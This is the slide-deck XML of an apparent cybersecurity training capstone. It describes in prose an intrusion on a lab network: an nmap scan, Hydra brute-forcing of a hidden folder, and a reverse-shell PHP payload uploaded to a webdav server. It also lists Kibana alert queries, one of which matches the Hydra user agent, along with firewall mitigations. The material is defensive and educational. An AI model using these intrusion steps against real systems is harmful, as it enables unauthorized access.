          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1145" name="Google Shape;1145;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6" name="Google Shape;1146;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7" name="Google Shape;1147;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Created a reverse shell payload and move it to webdav server as Ryan</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Listen to the host and port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Once the payload is executed, the attacker can listen to the Capstone server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Flag file was discovered </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1149" name="Google Shape;1149;p10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1150" name="Google Shape;1150;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51" name="Google Shape;1151;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2" name="Google Shape;1152;p1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54" name="Google Shape;1154;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267825" y="1421375"/>
            <a:ext cx="2876175" cy="1625343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1155" name="Google Shape;1155;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267825" y="3046725"/>
            <a:ext cx="2876175" cy="1014044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1156" name="Google Shape;1156;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267825" y="4060775"/>
            <a:ext cx="2876175" cy="346130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1157" name="Google Shape;1157;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6269231" y="4406900"/>
            <a:ext cx="2876175" cy="3812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1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3" name="Google Shape;1163;p11"/>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4" name="Google Shape;1164;p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
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="634600" y="1438175"/>
            <a:ext cx="7798800" cy="2895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171" name="Google Shape;1171;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296025" y="675975"/>
            <a:ext cx="8327100" cy="7269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port scan began just prior to 00:00 on 5-5-2021</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>At peak 51,757 packets were sent from 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>This sudden jump in TCP connections is from nmap</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1172" name="Google Shape;1172;p12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1742275" y="1438175"/>
            <a:ext cx="5659475" cy="289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a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1178" name="Google Shape;1178;p13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="8409300" cy="2384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[Insert Here]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Include a screenshot of Kibana logs depicting the request for the hidden directory. </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179" name="Google Shape;1179;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="658675"/>
            <a:ext cx="8409300" cy="976800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-154940" lvl="0" marL="320040" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>The initial request for access to /company/secretfolder occurred on approximately May 5th, 2021 at 00:20:51. A total of 31,828 requests were detected.</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-154940" lvl="0" marL="320040" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>A request for the connect_to_corp_server file was made from the secret folder. This file would have contained information to login to the corporate webdav server</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1180" name="Google Shape;1180;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1392200"/>
            <a:ext cx="8409299" cy="2507975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1181" name="Google Shape;1181;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="4052575"/>
            <a:ext cx="8409302" cy="64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187" name="Google Shape;1187;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285650" y="741300"/>
            <a:ext cx="9168600" cy="4206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We had 31,822 attacks from a Hydra password brute forcing application</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1188" name="Google Shape;1188;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="248625" y="1161900"/>
            <a:ext cx="8839200" cy="1951440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1189" name="Google Shape;1189;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248625" y="3285925"/>
            <a:ext cx="7877400" cy="4206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first successful attempt with a status of 301 was logged on May 5th, 2021 at 00:27:15.314</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1190" name="Google Shape;1190;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3592500"/>
            <a:ext cx="9087823" cy="6519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196" name="Google Shape;1196;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="741300"/>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65 requests were made to the webdav directory</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The file requested was shell2.php</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1197" name="Google Shape;1197;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="795400" y="1478150"/>
            <a:ext cx="7427624" cy="2494050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1198" name="Google Shape;1198;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3972200"/>
            <a:ext cx="8608475" cy="79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1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4" name="Google Shape;1204;p16"/>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5" name="Google Shape;1205;p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211" name="Google Shape;1211;p17"/>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kind of alarm can be set to detect future port scans?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Destination.ip: 192.168.1.105 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>destination.port: (not 443 or 80) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>source.ip: (not 192.168.1.105) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Report when above baseline port access per hour is triggered.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What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Send the alert email when &gt;10 not port 443 or port 80 scans within an hour.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1212" name="Google Shape;1212;p17"/>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configurations can be set on the host to mitigate port scans?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Install a Firewall</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>TCP Wrappers</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A firewall can help prevent unauthorized access to the network.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>TCP wrapper allows the flexibility to permit or deny access to the servers based on IP addresses or domain names.</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="202124"/>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218" name="Google Shape;1218;p1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kind of alarm can be set to detect future unauthorized access?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Source.ip: (not 192.168.1.105) and url.path: *secret_folder*</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Report when above baseline access per hour is triggered from an external IP.</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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Send the alert email when any access to the “secret_folder” from an IP not from 192.168.1.105.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1219" name="Google Shape;1219;p1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configuration can be set on the host to block unwanted access?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Windows hosts file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Uncomplicated firewall</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By adding entries to the Windows hosts file, you can block access to unwanted websites.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UFW is the default firewall configuration tool for Ubuntu Linux and provides a user-friendly way to configure the firewall</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="101600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F1F1F1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo ufw allow [port #]</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F5F5F5"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="241300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1700"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>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225" name="Google Shape;1225;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kind of alarm can be set to detect future brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http.request.method: "get" and user_agent.original: "Mozilla/4.0 (Hydra)" </a:t>
            </a:r>
            <a:endParaRPr/>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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Failed login(401) is a failed login response.  If anything more than &gt;50 401 errors per hour occur and/or a successful login response(201) occurs even once from a not whitelisted IP, send the alert email.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1226" name="Google Shape;1226;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configuration can be set on the host to block brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Use strong passwords</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
